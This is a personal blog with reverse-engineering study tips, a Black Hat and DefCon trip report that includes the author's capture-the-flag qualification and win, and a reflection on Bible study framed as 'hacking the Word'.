• Rather than avoiding "jump" calls to focus on the "meat", recognize that they are the structure. Capitalize on the opportunity to determine program flow. Draw the jumps with an arrow for each early in the reversing process


• Determine the "conditional statements" from the "jump" statements. Is it a "while (???) { }" or an "if (???){ } and what are the constraints? This helps determine where the "edges" of the program are


• "Ignore %reg, look around for meaning!" ie. Pay more attention to what memory location each register *represents*, instead of focusing on %eax specifically. Map this out on paper, being interested more in 0xffffffbe(%ebp) or 0x8(ebp) instead.


• Each sub has a finite number or variables (locals, parms, and heap)... know them. Label them if you can tell their purpose.


• For (%reg), look for %reg assignment BEFORE this line


• For %reg, look for %reg storage AFTER this line

[] permanent link / /

Black Hat and Def Con

Black Hat and Def Con!

Well, my friends. At last the week has come and gone. My family has done without me for 9 days, I've done without sleep for most of that, and my lips are swollen from desperately locking onto the firehose!

Web Application InSecurity

Starting out the week with NGS Software and Special Ops Security in the popular Web Application Software class. Two days was a little short for the original class, but it didn't lack. I was bored at first since they actually cover things as foreign to most developers as network topology and the security implications thereof. This has been my specialty for the past 4+ years.

I regained consiousness once we got started into the security aspects of web apps and server configs, though. Since these guys are pen-testers, not just security instructors their approach was refreshing, and took on much of the feel of an actual penetration test. I was rudely awakened by seemingly mundane things such as web server logging, when realizing how little useful information is logged by default when malicious code bangs it senseless. I guess I assumed that, but what I found intriguging was the settings to turn on valuable stuff!

Command Injection, SQL Injection, etc... It's all in there, and they didn't skimp on covering any of the good stuff. Each of the presenters were obviously accomplished in their field, and Chris Paget, the main instructor, even gave us a demo of his non-public time-based SQL injection tool, something that returns real data from the database server even when error messages are blocked by using time-based encoding. Very slick stuff indeed.

More on Chris later.

Drinking at BH/DC

I was fortunate enough to eat and drink with some of the greatest names in the security field, and that includes Mr. Paget. While checking into the hotel, a large man lumbers up behind me lugging some hefty computer equipment. I think my comment was "There can only be one reason you're here, what class are you taking?" He informed me that he was teaching Web App (In)Security. I laughed and introduced myself as being in his class the next day. When time came for him to meet friends and have a beer, I asked to accompany him. Little did I know who I would be drinking with. Great people (and names you'll recognize) such as David Litchfield (Jr. and Sr.), Marc Litchfield, Timothy Mullin, Eli O (whose card titles him "Grand Visier" of BH/DC), Erik Pace Birkholz and the rest of the SpecialOps (who co-taught the class), the rest of NGS, including Markus and Gunter, who is leaving NGS to take over technical leadership of another large company who has floundered in recent years (good luck to you Gunter!).

Overall they were great fun to hang out with and the conversations were very interesting, even of covering politics and faith. Ahhh, the wonders of alcohol and tobacco. Throughout the week I was also fortunate enough to drink with Mudge (who is very interesting and likeable), Simple Nomad, my dear friend Jay Beale (who has a nasty little Sushi habit!), Dan Kaminski, and many others who I leave off only for brevity, not unimportance. Indeed I've left out many who are very dear to my heart. Oh, what the hack! If you've reached your limit, skip this...

Greetz to Plato, Steven, Structure, Robb, individual, Toby and Amber!, Doc Brown and the Plan B crew, Jason, Darwin's Bastards (yo, guys!), TheArrogantSnit, Invisigoth, HackerJoe, Bob, Satori, Verbal, John, any other Kenshoto guys I may have missed, Nicole and Richard from NTO.

I must admit, however, that while being bold enough to converse with well-known people like they were normal people (a duh!) is great, I don't think some people are used to it. One person half way through the week asked me who the f*ck I was (I didn't take it badly, but it was curious). He said that when asked, everyone basically said that they thought I was *their* friend. When I asked if he thought me a social engineer, he said "Yes, exactly! not that that is necessarily a bad thing..." heh. Amusing times.

One of the highlights of the week was deep conversations with Chris Paget, particularly about weaknesses of current computer intelligence theory. Very unfortunately Chris had to leave early for personal reasons. He was definitely missed.

Another highlight had to be Microsoft's twin-parties. One at the Pure (Caesars Palace) and a followup at the Tangerine (Treasure Island). Not only did I get to meet and chat with awesome people, including HDMoore and Kevin Mitnick, but the night was topped off by watching Jay Beale and his unique and energetic dance moves! Heck, he even got *me* out on the dance floor.

Briefings

Wow, what a rush! First off, I've never seen so much alcohol on stage.

But beyond that, let's discuss the firehose I've been drinking!

Starting the morning off with David Litchfield discussing advanced SQL injection techniques, including time-based, as well as Oracle patching woes. Aside from some frustration over sound difficulties David was brilliant.

Mudge gave a talk on (what I think of as) basic-hacker-think... but the focus was on "functional fixation" and "learned immobility"... ie. who ever thought a plane could be a weapon!? Well, somebody did. The rest of us likely suffered from functional fixation. Short of a few meanderings not directly related to the topic Mudge proved he can handle lack of sleep and alcohol *very* well!

Spoonm and Skape from the MetaSploit Framework project were exceptional! The may have hit the basics of shellcoding a little too much for certain members of the crowd, but I can't say enough good things about the work they were detailing. I couldn't help but stick around afterward and catch the slides they felt compelled to skip to save time. Suffice it to say that Distributed Ninja and Meterpreter are payloads I will be learning in the near future. I did learn the unfortunate news that they will be forcing me to learn Ruby if I want to contribute (or read) Msf 3.0. I hear Ruby's great, but that's not a new theme for me (see Python/KenShoto later on). dN and Meterpretter are the next evolution of Syscall proxies, basically a snippit of code which accepts code from your system and executes it on the remote machine. Nothing is written to disk and Meterpretter even allows you to "migrate" which process they run in. dN runs on Linux, Meterpretter runs on Windows. They also clarified just what "stagers" are.

One of the stars of the show was definitely Johnny Long (johnny.ihackstuff.com). While I have a long history of appreciating Johnny, his speech was no let down. Particularly his wit when finding "googledorks". I really liked the comments about government findings ;) Buy Johnny's book. It's bound to be amusing and informative!

Not all Black Hat Briefings were as interesting to me. I attended one speaker who must have been a college professor (look and droning speech) who spoke on restricted computing environments, or sandboxes. While the potential impact was decent and the material could have been interesting (and he had *really cool* transitions in his preso), his presentation method lacked gusto and I was underwhelmed. Many folks didn't wait it out and left. I stuck around but to no avail.

DefCon

Yes, I know... I've already worn you out before getting to the good part. The truth is, I was so heads-down involved in the Capture the Flag (CTF) hacking competition that I don't have much to say.

The Kenshoto hacker group took over the CTF this year after the longstanding "Ghetto Hackers" hosts decided to retire. This being my first DefCon I can't speak to the transition. All I can say is that Kenshoto did an absolutely incredible job. There were some flubs along the way and yes, it cost me time, but overall I was so amazed at the complete package they put together, their thoroughness, that I can't even complain. They even included a feedback session afterwards so we could discuss how things turned out. I found it amusing that they did this prior to anyone learning who had won ;) Better that way, I think. What was so amazing?

From the moment I walked into the access-controlled room I felt like I was walking into a high-intensity playground/dance-club. Dim lights, technothrash music, the Black/Green color scheme, and the Blue siren-light all contributed to a feeling of greatness. The Kenshoto guys had their stuff together, even down to the green on black Kenshoto t-shirts which had different phrases each day...

Each night Caezar hosted parties which combined technogeeks with alcohol and saw amusing results. I was only able to catch two of the three parties, but the two I attended were pretty cool. Saturday I sat next to Dan Kaminski and a Microsoft employee and bash and posture and laugh until it hurt. That and discussions of Python being better than Perl (I'm not convinced yet), and of course watching Eli O dance while magically keeping two or three acryllic spheres afloat and tracing around his body-parts... they all contributed to a great time. Sunday's party was around pool 2 at the Alexis Park hotel, and enhanced by tossing a glow-stick inside the 1gallon juice jug filled with liquor-surprise... Tossing that around was probably more fun than the beach-balls. I got a chance to slow down and have a cool talk with Snit from Kenshoto, and ponder the impact of moving from my current address to the Virginia area. hmmmmm...... Tempting.

Falling asleep while _____ (version 2)

Well, I'm home now. After two hours sleep on Sunday, the plane rides were filled with the stuff. I intended to continue reversing CTF binaries, but alas that never happened. I just got around to that last night.

During the CTF Qualification round I found myself sleep-typing. At 5am it's amazing what the fingers have to say when you stop ordering them around and let their creative side show. "SegFailt os if it weren' groumedeor"

Well, since being home, I think I've topped it. I have actually fallen asleep while reading to my kids! "blah blah bla", he said............. <"daddy? Who said? Daddy???"> DOH!

Hopefully after some recovery I'll be able to better fit this new-found habit into my life without such extreme consequences.

By now, everyone is normally asking the question "How did you do at the CTF?" https://www.kenshoto.com/scores.html

Short and skinny? I didn't do nearly as well as I wished I had. And I won the individual (Ronin) contest, beating most of the teams.

Many thanks to those around me who I made alliances with, particularly the Darwin's Bastards, and of course my dear friend Plato, who very well could have beaten me. Greetz to the Shellphish and Sk3wl of R00t teams for a job very well done.

I won? and I'm not happy with that? Frankly, no. And it's not because I didn't beat the two top teams. It's about "my game" and no one else. I could have done more and done better and faster. I have much improvement to do this next year, and it can only come from more practice and better skillz. Why am I not happy? Because I resorted to lamer tactics of "low-hanging fruit" and social engineering rather than more challenging things. "Bottom line" is that I did what it took to win, but it's like playing defensive pool rather than simply shooting well. Next year I hope to run the table off the break.

Special nod to the friends I will keep out of this, especially Plato, Robb, Chris Paget, J-sLam, Snit and Invisigoth, drb and Toby.

[] permanent link / /

Hacking the Word

The last three weeks have been amazing and awful at the same time.

Two and a half weeks ago my wife and I picked up our adoptive daughter from the hospital! She's wonderful and tiring. Why did we do this? Kids need a loving home. Not all of them get them. Why a newborn? Wow... good question. Newborns are the reminder that something can be wonderful and terrible at the same time. Baby Abigail is an adorable little girl, mother from Zimbabwe, father is African-American. Aparently finding adoptive parents who are willing to adopt interracially are few, so we found out about our little wonder the day of our homestudy (the last part of adoption before the infamous "holding pattern"), 10 days before her due date! Standard time for waiting is between six months and two years. We are very blessed.

The wonderment did not stop there. And Biggel(her handle) is only responsible for half of my sleep-deprivation.

Friday, June 3rd saw the 10pm kick-off of the DefCon Hacking Capture-The-Flag(CTF) competition qualifying round. The new carriers of the DefCon CTF flag is the KenShoto group, and my hat's off to them. They did a great job!

Like a moron, I invited college friends to bring their three kids to visit for the weekend. They are not hackers... So, in order to avoid being rude (and incurring my wife's wrath) I relegated my hacking activities to post-bedtime... Friday and Saturday I didn't see the pillow before my ordinary alarm-clock setting. Surprising how 5:30am looks similar whether you're getting up or going to bed ;)

First stage was fun, with an easily hackable web-application using a hidden field and limited input-validation. It just took the appropriate amount of poking and guesswork. Finding the key was easy, so long as you took the logical route of grabbing /etc/passwd for all the information it contains. To be honest, I missed it. The "flag" was stored as the name of one of the users. I apparently was too busy looking for "real" information. In that respect, it was somewhat of a gimme, on the way to really hacking. I had already cracked a password and logged in before actually seeing the stage 1 key. The stage 2 key was provided when I logged in with the hacked user account. I was having fun already.

Stage 3 was much more difficult, and thus ultimately much more rewarding, and a great deal of the wonderment of my week. Logging into the account to get the stage 2 key, a binary file was pasted to my screen, the screen was blanked, the key was printed to my screen and I was logged out. Hmmmph.

That binary, upon inspection, appeared to be the program offering a service on port 6969. Attaining stage 3 meant finding a vulnerability in the binary and writing a remote exploit. As a talented security professional, this was still the territory of immortals. I nearly gave up when I realized what was required. I didn't.

I've been reading Erickson's book, "HACKING: The Art of Exploitation". Great book, but I had hit a dry patch (and been distracted by many other aspects of life) about page 20. It was dry because I knew it already... Given the challenge at hand, I looked in the table of contents to find buffer overflows (BOF) (which is the vulnerability-type I had determined to use). It started on page 23. DOH! So I quickly started back at page 20 and continued into the section on exploiting BOFs.

HTAE not only includes in-depth discussions of the hacking techniques, but provides examples which you can test and play with. Hands-on hacking. Nothing over the network (at least not where I was reading), but definitely enough to get started. That, coupled with a VMware installation of FreeBSD (the OS used on the "hackable" machine) and some debugging/reverse-engineering tools, and my blood/sweat/tears created a wholely original exploit (ok, so the payload was gratuitously stolen from the MetaSploit framework, thanks guys!) but I made the mechanics work.

I felt as if Ben Kenobi himself patted me on the shoulder and said "You've just taken your first step into a bigger world." But it was the KenShoto guys (Snit, Invisigoth) who congratulated me. I think they took pity on me, since they realized I was a sploit-virgin.

Hacking the Word: The process of learning more and understanding the scripture better than the average joe. Hacking is about knowledge and understanding, exploring and devouring. The use of such knowledge is really superfluous to the actual meaning of hacking.

Hacking the Word is going beyond the normally accepted platitudes and trite phrases of religiosity, much like poking and prodding IIS to see what undisclosed "goodies" it has to offer, past that which mere mortals choose to accept. Much like Hacking computer systems, Exploiting the Word lies in how you make use of it. Scouring the Word to find the unknown gems (or just proving them for yourself) will yield interesting brain-fodder for discussion, digestion, and a perspective which is lacking in this world of despair and mortality. 'leet Word-Hackers find riches without the threat of prison (at least for the moment). Hacking the Word can be more difficult and even more intriguing than computer hacking. In order to understand the Word, it takes more than just finding an unchecked buffer and overwriting a return address. It requires context, which means that an understanding of the whole source code is important. That's why hacking teams are formed, which are able to bring the experience of many to the table for discussion. Often these hacking groups are lead by experienced Word-Hackers, but they tend not to be exclusionary. leet-ness is gained through knowledge, not exclusion. The best line I've heard from one of these groups is "Don't take _my_ word for it. _Prove_me_wrong_!"

About a year ago I was introduced to new toolz and introduced to a new methodology to studying the writings of God's dudes (aka Biblos or the Bible, which means book). I attribute the new toolz and methodology to divine inspiration since nobody really "taught" me. I was met with a new way to get depth of understanding, at the same time I found a driving passion to learn more that what I'd been taught growing up.

The ensuing "devouring" of the Word lead to intriguing discoveries and understandings. Many of the principles had been taught me since birth, but the context and word-origins were refreshingly new and gave me the ability to take a skeptic's view on the "obvious" meaning.

What were these toolz of mine, you ask? The Sword Bible libraries and modules, front-ended with BibleTime bible-study software.

The Sword provides many types of modules in many different languages. Being Open Sourced and openly available, the NIV is not an option (apparently the copyright owner supports a lot of missions work with the royalties). I've found I like the WEB (World English Bible) for readability. I tie that to the King James Version (yes, like a parallel bible) because the KJV has ties to "Strong's Numbers" which are an indexing and definining of the original Greek or Hebrew words! Talk about using the Source, Luke! Since I have not been able to learn either of those langauges to any real extent, using the definitive definition, and being able to compare word numbers between verses with like words, has been incredibly eye-opening. English jumbles and combines words; for instance, there are 8 definitions of "Love" in the Hebrew language, two definitions of the verb "to Know" in Spanish, etc...

Kate has also added to my experience! Kate is the MDI advanced text editor of the KDE project. Why does Kate make that big a deal? Well, I've been pretty lax about taking notes during BibleStudies and Church Sermons. Kate makes it simple to at the *very least* keep track of Bible verses in use throughout the teaching. That way, even if I don't agree with the interpretation or usage I can always return later and do more digging. Since that time, I've found a reason to get up early in the morning and spend time with the Architect, learning about the Creator and communing/submitting myself to His will. In fact, that's where I'm going right now.

Oh, by the way... I believe I have qualified for the Capture the Flag in July! So, if you're in Vegas the last weekend of July, stop by Def Con and we'll meet. You can email me ahead of time at atlas_THAT_AT_THINGY_r4780y.com

@145

[] permanent link / /